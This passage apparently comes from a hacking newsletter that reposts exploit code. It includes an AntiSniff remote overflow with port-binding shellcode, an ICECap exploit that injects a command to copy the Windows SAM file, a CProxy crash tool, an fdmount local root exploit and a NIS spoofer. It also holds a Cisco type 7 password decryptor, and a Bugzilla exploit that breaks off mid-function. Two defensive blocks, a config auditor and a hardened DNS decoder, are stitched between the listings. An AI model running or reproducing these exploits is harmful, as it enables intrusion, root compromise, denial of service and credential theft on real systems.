pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);
fprintf(out, "%s\n", passwd);
}
}
}
/* www.hack.co.za [19 May]*/
-=-
#! /bin/sh
## Decrypts cisco "encrypted" passwords. Feed this confg files as stdin.
## Anything that looks like a "type 7 encrypted" string gets decrypted.
## This should really be a C program, but is presented as a script just to
## piss off a certain group of people. One beer, please...
while read xx ; do
case "$xx" in
*d\ 7\ [01]??* ) ;;
*) continue ;;
esac
DEC=`echo "$xx" | sed -e 's/.* //' -e 's/\(^..\).*/\1/'`
DP1=`expr $DEC + 1`
HEX=`echo "$xx" | sed -e 's/.* //' -e 's/^..\(..*\)/\1/'`
echo 'dsfd;kfoA,.iyewrkldJKDHSUB' | cut -c "${DP1}-30" > /tmp/cis$$.pad
echo '#' > /tmp/cis$$.in
for xx in 1-2 3-4 5-6 7-8 9-10 11-12 13-14 15-16 17-18 19-20 21-22 ; do
echo "${HEX}" | cut -c $xx | sed -e '/^$/q' -e 's/^/0x/' >> /tmp/cis$$.in
done
echo -n "${DEC}${HEX}: "
data -g < /tmp/cis$$.in | xor /tmp/cis$$.pad
echo ''
done
rm -f /tmp/cis$$.pad /tmp/cis$$.in
exit 0
# Discussion:
# When "service password-encryption" is configured into a cisco router and
# the configuration subsequently viewed, the passwords are no longer printed
# as plaintext but as strings of randomish-looking garbage. Analysis of
# several samples reveals the scrambling algorithm to be trivially weak.
# Dr. Delete derived and published an analysis and decryption program some
# time ago, but since that didn't seem to be generally available at the time
# I went looking for it, here is an independent explanation. This was worked
# out on PAPER over a plate of nachos in a hotel bar in downtown LA, but
# still illustrates where a general-purpose "xor" handler can be useful for
# quickly cracking lame "proprietary" algorithms of this genre.
# Passwords can be up to eleven mixed-case characters. In the "encrypted"
# representation, the first two bytes of the long string are a random decimal
# offset between 0 and 15 into a magic block of characters, and the remaining
# bytes are ascii-hex representations of the password bytes xored against
# the character-block bytes from the given offset on down. The character
# block is "dsfd;kfoA,.iyewrkldJKDHSUB", which is enough for a maximum-length
# password at the maximum offset.
# Another character block consisting of "sgvca69834ncxv9873254k;fg87" is
# located after the first one in the IOS image, which may be relevant to
# something else and is simply mentioned here for posterity. It is also
# interesting to note that the strings "%02d" and "%02x" occur immediately
# afterward, which in light of the above is another clue.
# _H* 960315
# www.hack.co.za [14 May]#
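The scheme described in the discussion above, turned into a configuration audit. This is an added example, not part of either original program: it flags every "password 7" line whose value can be reversed with the published character block, and reports only the recovered length. The sample configuration, the two type 7 strings (built from that block) and the function names are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Character block quoted in the discussion above. */
static const char T7_BLOCK[] = "dsfd;kfoA,.iyewrkldJKDHSUB";

/* Constructed sample configuration (not taken from a real device). */
static const char SAMPLE_CFG[] =
    "hostname lab-rtr\n"
    "service password-encryption\n"
    "enable password 7 0822455D0A16\n"
    "line vty 0 4\n"
    " password 7 02050D480809\r\n"
    " login\n"
    "line aux 0\n"
    " password 7 16ZZ\n";          /* malformed: offset > 15, bad hex */

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = toupper(c);
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode one type 7 string ("ddHHHH...") into out.
 * Returns the plaintext length, or -1 when the input is malformed or
 * would run past the character block or the output buffer. */
int type7_decode(const char *enc, char *out, size_t out_len)
{
    size_t n = strlen(enc), i, o = 0, off;

    if (n < 4 || (n & 1) ||
        !isdigit((unsigned char)enc[0]) || !isdigit((unsigned char)enc[1]))
        return -1;
    off = (size_t)(enc[0] - '0') * 10 + (size_t)(enc[1] - '0');
    if (off > 15)
        return -1;
    for (i = 2; i < n; i += 2) {
        int hi = hexval((unsigned char)enc[i]);
        int lo = hexval((unsigned char)enc[i + 1]);
        if (hi < 0 || lo < 0)
            return -1;
        if (off + o >= sizeof(T7_BLOCK) - 1 || o + 1 >= out_len)
            return -1;
        out[o] = (char)(((hi << 4) | lo) ^ T7_BLOCK[off + o]);
        o++;
    }
    out[o] = '\0';
    return (int)o;
}

/* Walk a configuration line by line and count the lines that carry a
 * reversible type 7 value. The plaintext is never written to the report,
 * only its length. */
int audit_config(const char *cfg, FILE *report)
{
    static const char marker[] = "password 7 ";
    int lineno = 0, weak = 0;

    while (*cfg) {
        const char *eol = strchr(cfg, '\n');
        size_t adv = eol ? (size_t)(eol - cfg) : strlen(cfg);
        size_t len = adv;
        char line[256], plain[64];

        lineno++;
        if (len < sizeof(line)) {
            char *hit;
            memcpy(line, cfg, len);
            line[len] = '\0';
            while (len && (line[len - 1] == '\r' || line[len - 1] == ' '))
                line[--len] = '\0';
            hit = strstr(line, marker);
            if (hit && type7_decode(hit + strlen(marker), plain,
                                    sizeof(plain)) >= 0) {
                weak++;
                if (report)
                    fprintf(report, "line %d: type 7 value is reversible "
                            "(%zu characters recovered); replace it with a "
                            "hashed secret and rotate the password\n",
                            lineno, strlen(plain));
            }
        }
        cfg += adv + (eol ? 1 : 0);
    }
    return weak;
}

int main(void)
{
    int n = audit_config(SAMPLE_CFG, stdout);
    printf("%d reversible type 7 value(s) found\n", n);
    return 0;
}
```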
@HWA
256.0 [IND] l0phtl0phe-kid.c remote linux misc overflow by scut/teso.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://teso.scene.at/
/* l0phtl0phe-kid.c - antisniff exploit (1-1-1 "second fixed version" included)
*
* -scut/teso
*
* gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`
*
* description:
* l0pht messed up the fix for their problem in antisniff by not regarding
* the type signedness properties of the char and int values used. this
* results in a cool method bypassing the two extra checks (length + strncat).
* some work on this topic has been done by mixter, (bad results on type
* casting), but it should be obvious to any security conscious programmers.
* i'm not stating that they aren't allowed errors, but they should fix it
* for sure if they're going to fix it at all. -sc.
*
* 2nd version: script kiddie proof to avoid that "doesn't work" lamer claim.
*
* greetings to all teso, lam3rz, hert, adm, w00w00 and lsd ppl.
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <libnet.h>
#define OFFSET 0xbffef9a0
unsigned int build_xp (unsigned char *xp);
int
main (int argc, char *argv[])
{
int sock; /* raw socket */
u_long src_ip,
dst_ip;
unsigned char xpbuf[1024]; /* this one gets complicated now */
unsigned char tpack[2048]; /* packet buffer */
unsigned int pl_len;
if (argc != 3) {
printf ("usage: %s <source ip> <dest ip>\n\n", argv[0]);
exit (EXIT_FAILURE);
}
sock = libnet_open_raw_sock (IPPROTO_RAW);
if (sock == -1) {
perror ("libnet_open_raw_sock");
exit (EXIT_FAILURE);
}
src_ip = libnet_name_resolve (argv[1], 0);
dst_ip = libnet_name_resolve (argv[2], 0);
pl_len = build_xp (xpbuf);
libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,
src_ip, dst_ip, NULL, 0, tpack);
libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,
tpack + IP_H);
libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,
xpbuf, pl_len, tpack + IP_H + UDP_H);
libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);
/* they use "udp and dst port 53" as bpf, so we should have no problem
*/
libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);
libnet_close_raw_sock (sock);
printf ("exploitation succeeded.\n");
printf ("try: \"telnet %s 17664\" now.\n", argv[2]);
exit (EXIT_SUCCESS);
}
/* build_xp
*
* build exploit buffer into buffer pointed to by `xp'.
*/
unsigned int
build_xp (unsigned char *xp)
{
int i;
unsigned char buf[1024];
unsigned char shellcode[] =
/* portshell 17644 portshellcode by smiler & scut */
"\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0"
"\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1"
"\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe"
"\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66"
"\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16"
"\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08"
"\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0"
"\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0"
"\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe"
"\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31"
"\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c"
"\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8"
"\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned char head[] =
"\x07-7350-\x00\xfe";
memcpy (buf, head, 9);
for (i = 9 ; i < (sizeof (buf) - strlen (shellcode)) ; ++i)
buf[i] = '\x90';
memcpy (buf + sizeof (buf) - strlen (shellcode), shellcode,
strlen (shellcode));
buf[272] = '\xeb';
buf[273] = '\x08';
buf[274] = (OFFSET ) & 0xff;
buf[275] = (OFFSET >> 8) & 0xff;
buf[276] = (OFFSET >> 16) & 0xff;
buf[277] = (OFFSET >> 24) & 0xff;
memcpy (xp, buf, sizeof (buf));
return (sizeof (buf));;
}
/* www.hack.co.za [19 May]*/
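The signedness mistake named in the header comment above, shown as a constructed illustration next to a hardened label decoder. This is an added example, not AntiSniff's code and not part of the original listing; the 256-byte buffer, the function names and the sample names are assumptions. The flawed routine copies nothing, it only reports the count the check would let through.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME_BUF 256   /* assumed size of the destination name buffer */

/* Constructed sample inputs: a well-formed name, and one whose second
 * length byte is 0xfe. */
static const unsigned char GOOD_NAME[] =
    { 3,'w','w','w', 7,'e','x','a','m','p','l','e', 3,'c','o','m', 0 };
static const unsigned char BAD_NAME[] =
    { 3,'w','w','w', 0xfe, 'A','A', 0 };

/* Flawed pattern: the length byte is held in a signed char. 0xfe becomes
 * -2, so "len > room" is false and the check passes; the same value
 * converted to size_t for a strncat()-style copy is close to SIZE_MAX.
 * Returns 1 if the check accepts the label and stores the count that
 * would be handed to the copy routine. Nothing is copied here. */
int flawed_label_check(unsigned char len_byte, size_t used, size_t *copy_count)
{
    signed char len = (signed char)len_byte;
    int room = NAME_BUF - 1 - (int)used;

    if (len > room)
        return 0;
    *copy_count = (size_t)len;
    return 1;
}

/* Hardened decoder for an uncompressed DNS name. Every length is unsigned
 * and is checked against both the bytes left in the message and the space
 * left in the output before anything is copied.
 * Returns the length of the dotted name written to out, or -1. */
int decode_name(const unsigned char *msg, size_t msg_len,
                char *out, size_t out_len)
{
    size_t pos = 0, o = 0;

    if (out_len == 0)
        return -1;
    for (;;) {
        size_t len;
        if (pos >= msg_len)
            return -1;                  /* ran off the end of the packet */
        len = msg[pos++];               /* unsigned: 0..255 */
        if (len == 0)
            break;                      /* root label ends the name */
        if (len > 63)
            return -1;                  /* RFC 1035 label limit; also
                                           rejects compression pointers */
        if (len > msg_len - pos)
            return -1;                  /* label longer than data left */
        if (o + len + 1 >= out_len)
            return -1;                  /* dot + label + NUL must fit */
        if (o)
            out[o++] = '.';
        memcpy(out + o, msg + pos, len);
        o += len;
        pos += len;
    }
    out[o] = '\0';
    return (int)o;
}

int main(void)
{
    char name[NAME_BUF];
    size_t n = 0;

    if (flawed_label_check(0xfe, 0, &n))
        printf("flawed check accepts 0xfe, copy count %zu\n", n);
    printf("good name -> %d\n",
           decode_name(GOOD_NAME, sizeof(GOOD_NAME), name, sizeof(name)));
    printf("bad name  -> %d\n",
           decode_name(BAD_NAME, sizeof(BAD_NAME), name, sizeof(name)));
    return 0;
}
```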
@HWA
257.0 [IND] RFPickaxe.pl winnt remote exploit.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
#
# RFPickaxe.pl - demo exploit for default ICECap login/alerts
# Disclaimer: I do not provide technical support for my exploits!
#
# Sorry, this requires Unix, due to the `date` call
$|=1;
use Socket;
###############################################################
# IP of ICECap system (assumes port 8082)
$Target="10.10.200.4";
# account info - uses default 'iceman' w/ no password
$account="iceman";
$httpauth="aWNlbWFuOiUzQjclQzYlRkU=";
#-------- attributes of the alert ----------
$id="100005";
$issue_name="Exploit";
$sev="1";
# spoof these
$target="0.0.0.8";
$target_dns="some.host.com";
$det_ip="0.0.0.8";
$det_nbn="SENSOR";
$int_ip="255.255.255.255";
$param="Pickaxe";
# either fake the MAC, or use it to run commands via JET vulnerability
#$det_mac="0000000000000";
$det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ".
"c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|";
##############################################################
$inet=inet_aton($Target);
$time=`date -u "+%Y-%m-%d %T"`;
$time=~s/ /%20/g;
$time=~s/:/%3a/g;
#path is \program files\network ice\icecap\spatch\en
$alert="accountName=$account&issueID=$id&issueName=$issue_name".
"&severity=$sev&targetNetAddress=$target&targetDNSName=".
"$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS".
"Name=$det_nbn&detectorMacAddress=$det_mac&".
"intruderNetAddress=$int_ip&detectorType=3&startTime=".
"$time&parameter=$param\r\n";
$len=length($alert);
@DXX=();
$send=<<EOT
POST / HTTP/1.0
User-Agent: netice-alerter/1.0
Host: $Target:8082
Authorization: Basic $httpauth
Content-Type: application/x-www-form-urlencoded
Content-Length: $len
EOT
;
$send=~s/\n/\r\n/g;
$send=$send.$alert;
sendraw("$send");
print @DXX;
exit;
sub sendraw { # raw network functions stay in here
my ($pstr)=@_;
$PROTO=getprotobyname('tcp')||0;
# AF_INET=2 SOCK_STREAM=1
eval {
alarm(30);
if(!(socket(S,2,1,$PROTO))){ die("socket");}
if(connect(S,pack "SnA4x8",2,8082,$inet)){
# multi-column perl coding...don't do as I do ;)
select(S); $|=1;
print $pstr;
@DXX=<S>;
select(STDOUT); close(S);
alarm(0); return;
} else { die("not responding"); }
alarm(0);};
if ($@) { if ($@ =~ /timeout/){ die("Timed out!\n");}}}
# www.hack.co.za [18 May]#
@HWA
258.0 [IND] cproxy.c winnt remote dos attack by |[TDP]|.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
tdp@psynet.net
/*
* Remote Denial of Service for CProxy v3.3 - Service Pack 2
*
* (C) |[TDP]| - HaCk-13 TeaM - 2000 <tdp@psynet.net>
*
*
* This program xploits an overflow vulnerability in CProxy 3.3 SP2
* HTTP Service (8080), causing server shutdown
*
* Greetings to all the other members and all my friends :)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFFERSIZE 247
#define NOP 0x90
// If you change this values you can change EIP and EBP values
// to redirect to a code that you want >;)
#define EIP 0x61616161
#define EBP 0x61616161
void usage(char *progname) {
fprintf(stderr,"Usage: %s <hostname> [eip] [ebp]\n",progname);
exit(1);
}
int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE], remotedos[1024];
unsigned long *long_ptr,eip=EIP, ebp=EBP;
int aux,sock;
struct sockaddr_in sin;
unsigned long ip;
struct hostent *he;
fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");
if (argc<2) usage(argv[0]);
if (argc>=3) eip+=atol(argv[2]);
if (argc>=4) ebp+=atol(argv[3]);
ptr=buffer;
memset(ptr,0,sizeof(buffer));
memset(ptr,NOP,sizeof(buffer)-8);
ptr+=sizeof(buffer)-8;
long_ptr=(unsigned long*)ptr;
*(long_ptr++) = ebp;
*(long_ptr++) = eip;
ptr=(char *)long_ptr;
*ptr='\0';
bzero(remotedos, sizeof(remotedos));
snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("socket()");
return -1;
}
if ((he = gethostbyname(argv[1])) != NULL) {
ip = *(unsigned long *)he->h_addr;
} else {
if ((ip = inet_addr(argv[1])) == NULL) {
perror("inet_addr()");
return -1;
}
}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip;
sin.sin_port = htons(8080);
fprintf(stderr,"\nEngaged...\n");
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect()");
return -1;
}
if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos)) {
perror("write()");
return -1;
}
fprintf(stderr,"Bye Bye baby!...\n\n");
if (close(sock) < 0) {
perror("close()");
return -1;
}
return(0);
}
/* www.hack.co.za [18 May]*/
@HWA
259.0 [IND] fdmnt-smash2.c slackware 7.0 local exploit by Scrippie.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ronald@grafix.nl
/*
Welcome dear reader - be it scriptkiddy, whose sole intent it is to
destroy precious old Unix boxes or Assembly Wizard whose sole intent it
is to correct my code and send me a flame.
The fdutils package contains a setuid root file that is used by the floppy
group to mount and unmount floppies. If you are not in this group, this
exploit will not work.
This thingy was tested on Slackware 4.0 and 7.0
Use as: fdmount-exp [offset] [buf size] [valid text ptr]
Since the char * text is overwritten in void errmsg(char *text) we should
make sure that this points to a valid address (something in the .data
section should do perfectly). The hard coded one used works on my box,
to find the one you need use something like:
objdump --disassemble-all $(whereis -b fdmount) | grep \<.data\> \
cut -d " " -f1
The HUGE number of nops is needed to make sure this exploit works.
Since it Segfaults out of existence without removing /etc/mtab~ we
only get one try...
Take care with your newly acquired EUID 0!
Cheers go out to: #phreak.nl #b0f #hit2000 #root66
The year 2000 scriptkiddie award goes to: Gerrie Mansur
Love goes out to: Hester, Maja (you're so cute!), Dopey
-- Yours truly,
Scrippie - ronald@grafix.nl - buffer0verfl0w security
- #phreak.nl
*/
#include <stdio.h>
#define NUM_NOPS 500
// Gee, Aleph1 his shellcode is back once more
char shellcode[] =
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
int buf_size = 71;
int offset=0, i;
char *overflow;
char *ovoff;
long addr, ptr=0x0804c7d0;
if(argc>1) offset = atoi(argv[1]);
if(argc>2) buf_size = atoi(argv[2]);
if(argc>3) ptr = strtol(argv[3], (char **) NULL, 16);
printf("##############################################\n");
printf("# fdmount Slack 4/7 exploit - by Scrippie #\n");
printf("##############################################\n");
printf("Using offset: %d\n", offset);
printf("Using buffer size: %d\n", buf_size);
printf("Using 0x%x for \"void errmsg(char *text,...)\" char *text\n", ptr);
if(!(overflow = (char *)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) {
fprintf(stderr, "Outta memory - barging out\n");
exit(-1);
}
overflow[0] = '/';
for(i=1;i<buf_size;i++) {
overflow[i] = 0x90;
}
addr = get_sp() - offset;
printf("Resulting address: 0x%x\n", addr);
memcpy(overflow + strlen(overflow), (void *) &addr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
ovoff = overflow + strlen(overflow);
for(i=0;i<NUM_NOPS;i++) {
*ovoff = 0x90;
*ovoff++;
}
strcpy(ovoff, shellcode);
execl("/usr/bin/fdmount", "fdmount", "fd0", overflow, NULL);
return 0;
}
/* www.hack.co.za [18 May]*/
@HWA
260.0 [IND] nis-spoof.c remote rpc exploit.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* Spoof the response from a NIS server to a client. Be nice, I'm not
* responsible if you do illegal things with this, nor do I condone it. I
* just thought it was interesting and others might as well.
cc `libnet-config --cflags --defines` nis-spoof.c -lpcap \
`libnet-config --libs` -o nis-spoof
Licensed under the terms of the GPL.
$Id: nis-spoof.c,v 1.1.1.1 2000/05/11 23:17:20 tschroed Exp $
See http://www.zweknu.org/src/nis-spoof/ for the latest version
*/
#include <stdio.h>
#include <pcap.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <libnet.h>
#ifdef __OpenBSD__
#include <sys/ioctl.h>
#include <net/bpf.h>
struct pcap {
int fd;
/* Who cares what else is in there? */
};
#endif /* __OpenBSD__ */
/* This simulates the {old|new} pcap_immediate() function. It may not do
* anything on some platforms. */
int my_pcap_immediate(pcap_t *p)
{
/* Thanks to Michael T. Stolarchuk <mts@off.to> for the bit to do this and
* lots of other info besides. */
#ifdef __OpenBSD__
unsigned int value=1;
struct pcap *sp=(struct pcap*)p;
/* I don't know that this jives with what pcap_immediate() is
* supposed to return, but the pcap man page only specifies that
* error == -1 */
return ioctl(sp->fd,BIOCIMMEDIATE,&value);
#else
return -1;
#endif /* __OpenBSD__ */
}
/* I'm making this stuff up. I don't actually *know* the NIS protocol,
* just what I get on a packet dump. */
/* Assume 32 bit arch... */
struct nisquery_st
{
u_int serial;
char dragons[36]; /* I see 86a4 in all the dragons, even on Linux.
I wonder what that's about. */
u_int dom_len;
char domainname[1024];
u_int map_len;
char mapname[1024];
u_int key_len;
char key[1024];
};
/* More guesswork */
char voodoo[]={ 0,0,
0,1,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,
0,0,0,0,0,1};
struct nisresponse_st
{
u_int serial;
char magic[sizeof(voodoo)];
u_int resp_len;
char resp[1024];
};
#define MAC_HEADER_LEN 14
#define PACKET_SIZE 4096
#define PROMISC 1
/***************/
/* Global Vars */
/***************/
struct nisquery_st nq;
struct nisresponse_st nr;
pcap_t *sniffer;
u_short port=0;
char hostname[64],etherdev[64],key[64],map[64],domain[64];
u_char *ippacket;
int rawsock;
/***************/
/***************/
/***************/
void usage(FILE *out,char *name)
{
fprintf(out,"Usage %s -h <host> -p <port> -r <response> -i <interface> "
"-k <key> -m <map> -d <domain>\n",name);
}
void set_options(int argc,char **argv)
{
char ch;
while((ch=getopt(argc, argv, "p:h:r:i:m:d:k:"))!=-1)
{
switch(ch)
{
case 'm':
strncpy(map,optarg,sizeof(map));
map[sizeof(map)-1]=0;
break;
case 'd':
strncpy(domain,optarg,sizeof(domain));
domain[sizeof(domain)-1]=0;
break;
case 'k':
strncpy(key,optarg,sizeof(key));
key[sizeof(key)-1]=0;
break;
case 'p':
port=atoi(optarg);
break;
case 'h':
strncpy(hostname,optarg,sizeof(hostname));
hostname[sizeof(hostname)-1]=0;
break;
case 'i':
strncpy(etherdev,optarg,sizeof(etherdev));
etherdev[sizeof(etherdev)-1]=0;
break;
case 'r':
strncpy(nr.resp,optarg,sizeof(nr.resp));
nr.resp[sizeof(nr.resp)-1]=0;
nr.resp_len=strlen(nr.resp);
nr.resp_len=htonl(nr.resp_len);
break;
case '?':
default:
usage(stderr,argv[0]);
exit(1);
}
}
}
/*
int open_rawsock(void)
{
int rawsock,val=1;
if((rawsock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0)
{
perror("socket");
exit(1);
}
if(setsockopt(rawsock,IPPROTO_IP,IP_HDRINCL,&val,sizeof(val))<0)
{
perror("setsockopt");
exit(1);
}
return rawsock;
}
*/
int open_rawsock(void)
{
int rawsock;
if(libnet_init_packet(PACKET_SIZE,&ippacket)==-1)
{
perror("libnet_init_packet");
exit(1);
}
if((rawsock=libnet_open_raw_sock(IPPROTO_RAW))==-1)
{
perror("libnet_open_raw_sock");
exit(1);
}
return rawsock;
}
pcap_t *open_sniffer(void)
{
char filterstr[1024],errbuf[4096];
pcap_t *capdev;
struct bpf_program filter;
int localnet=0,netmask=0;
sprintf(filterstr,"dst host %s and udp and dst port %d",hostname,port);
printf("Filter: \"%s\"\n",filterstr);
if((capdev=pcap_open_live(etherdev,PACKET_SIZE,PROMISC,1,errbuf))==NULL)
{
fprintf(stderr,"pcap_open_live: %s\n",errbuf);
exit(1);
}
if(pcap_lookupnet(etherdev,&localnet,&netmask,errbuf))
{
fprintf(stderr,"pcap_lookupnet: %s\n",errbuf);
exit(1);
}
if(pcap_compile(capdev,&filter,filterstr,1,netmask))
{
pcap_perror(capdev,"pcap_compile");
exit(1);
}
if(pcap_setfilter(capdev,&filter))
{
pcap_perror(capdev,"pcap_setfilter");
exit(1);
}
my_pcap_immediate(capdev);
return capdev;
}
/* Send a response to buf */
void send_response(char *buf,int len)
{
int i;
u_char ihl=4*(0xF&(u_char)buf[MAC_HEADER_LEN]);
u_char scratch[4];
u_short tlen,rlen,payload_len;
buf+=MAC_HEADER_LEN;
rlen=0xFFFF&(ntohl(nr.resp_len) +
((ntohl(nr.resp_len)%4)?4-(ntohl(nr.resp_len)%4):0));
bzero(ippacket,sizeof(ippacket));
nr.serial=nq.serial;
bcopy(buf,ippacket,len);
/* printf("##############################################\n"); */
payload_len=sizeof(nr)-sizeof(nr.resp)+rlen;
bcopy(&nr,ippacket+len,payload_len);
tlen=len+payload_len;
/*
for(i=0;i<tlen;i++)
printf("%c%2.2x",i%16?' ':'\n',ippacket[i]);
printf("\n");
*/
tlen=htons(tlen);
/* Set total length */
bcopy(&tlen,&ippacket[2],2);
/* Set TTL */
ippacket[8]=24;
/* Swap IP src/dst */
bcopy(&ippacket[12],scratch,4);
bcopy(&ippacket[16],&ippacket[12],4);
bcopy(scratch,&ippacket[16],4);
/* Swap port src/dst */
bcopy(&ippacket[ihl],scratch,2);
bcopy(&ippacket[ihl+2],&ippacket[ihl],2);
bcopy(scratch,&ippacket[ihl+2],2);
/* Set UDP len */
payload_len+=8;
payload_len=htons(payload_len);
bcopy(&payload_len,&ippacket[ihl+4],2);
tlen=ntohs(tlen);
if(libnet_do_checksum(ippacket,IPPROTO_UDP,tlen-ihl)<0)
{
perror("libnet_do_checksum");
exit(1);
}
/*
for(i=0;i<tlen;i++)
printf("%c%2.2x",i%16?' ':'\n',ippacket[i]);
printf("\n");
*/
libnet_write_ip(rawsock,ippacket,tlen);
}
void framehandler(u_char *user, struct pcap_pkthdr *ph, u_char *buf)
{
/* Let's assume a 14-byte MAC header!! :) Data offset = 14 + IHL*4
* + 8 */
u_char dataoffset=MAC_HEADER_LEN+4*(0xF&(u_char)buf[MAC_HEADER_LEN])+8;
u_short datalen=ntohs((*(u_short *)&(buf[dataoffset-4]))&0xFFFF)-8;
u_short curpos;
int i=0;
/* printf("Offset: %d\nLength: %2.2x\n\n",dataoffset,datalen); */
bzero(&nq,sizeof(nq));
bcopy(&buf[dataoffset],&nq.serial,4);
curpos=dataoffset+4;
bcopy(&buf[curpos],&nq.dragons,sizeof(nq.dragons));
curpos+=sizeof(nq.dragons);
nq.dom_len=ntohl((*(u_int *)&(buf[curpos])));
curpos+=4;
bcopy(&buf[curpos],nq.domainname,nq.dom_len);
curpos+=nq.dom_len;
if(nq.dom_len%4)
curpos+=4-(nq.dom_len%4);
nq.domainname[nq.dom_len]=0;
nq.map_len=ntohl((*(u_int *)&(buf[curpos])));
curpos+=4;
bcopy(&buf[curpos],nq.mapname,nq.map_len);
curpos+=nq.map_len;
if(nq.map_len%4)
curpos+=4-(nq.map_len%4);
nq.mapname[nq.map_len]=0;
nq.key_len=ntohl((*(u_int *)&(buf[curpos])));
curpos+=4;
bcopy(&buf[curpos],nq.key,nq.key_len);
curpos+=nq.key_len;
if(nq.key_len%4)
curpos+=4-(nq.key_len%4);
nq.key[nq.key_len]=0;
if(!strcmp(nq.key,key) &&
!strcmp(nq.mapname,map) &&
!strcmp(nq.domainname,domain))
{
fprintf(stderr,"Match: %s %s [%s]\n"
,nq.key,nq.mapname,nq.domainname);
send_response(buf,dataoffset-14);
}
}
int main(int argc, char **argv)
{
set_options(argc,argv);
if(hostname[0]==0 || port==0 || etherdev[0]==0 || nr.resp_len==0
|| key[0]==0 || map[0]==0 || domain[0]==0)
{
printf("Hostname: %s\n",hostname);
printf("Port: %d\n",port);
printf("Interface: %s\n",etherdev);
printf("Response: %s\n",nr.resp);
usage(stderr,argv[0]);
exit(1);
}
sniffer=open_sniffer();
rawsock=open_rawsock();
printf("Answering queries for %s:%d\n",hostname,port);
bcopy(voodoo,&nr.magic,sizeof(voodoo));
pcap_loop(sniffer,0,framehandler,NULL);
return 0;
}
/* www.hack.co.za [14 May]*/
@HWA
261.0 [IND] bugzilla.pl remote cgi exploit by karin.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
karin@root66.nl.eu.org
#!/usr/bin/perl
# Bugzilla 2.8 remote exploit
# by {} - karin@root66.nl.eu.org
# RooT66 - http://root66.nl.eu.org
# ShellOracle - http://www.shelloracle.cjb.net
# b0f - http://b0f.freebsd.lublin.pl
#
# This exploits uses antiIDS tricks ripped from whisker
#
# next 2 functions stolen from whisker, commented by me
sub rstr { # no, this is not a cryptographically-robust number generator
my $str,$c;
$drift=(rand() * 10) % 10;
for($c=0;$c<10+$drift;$c++){
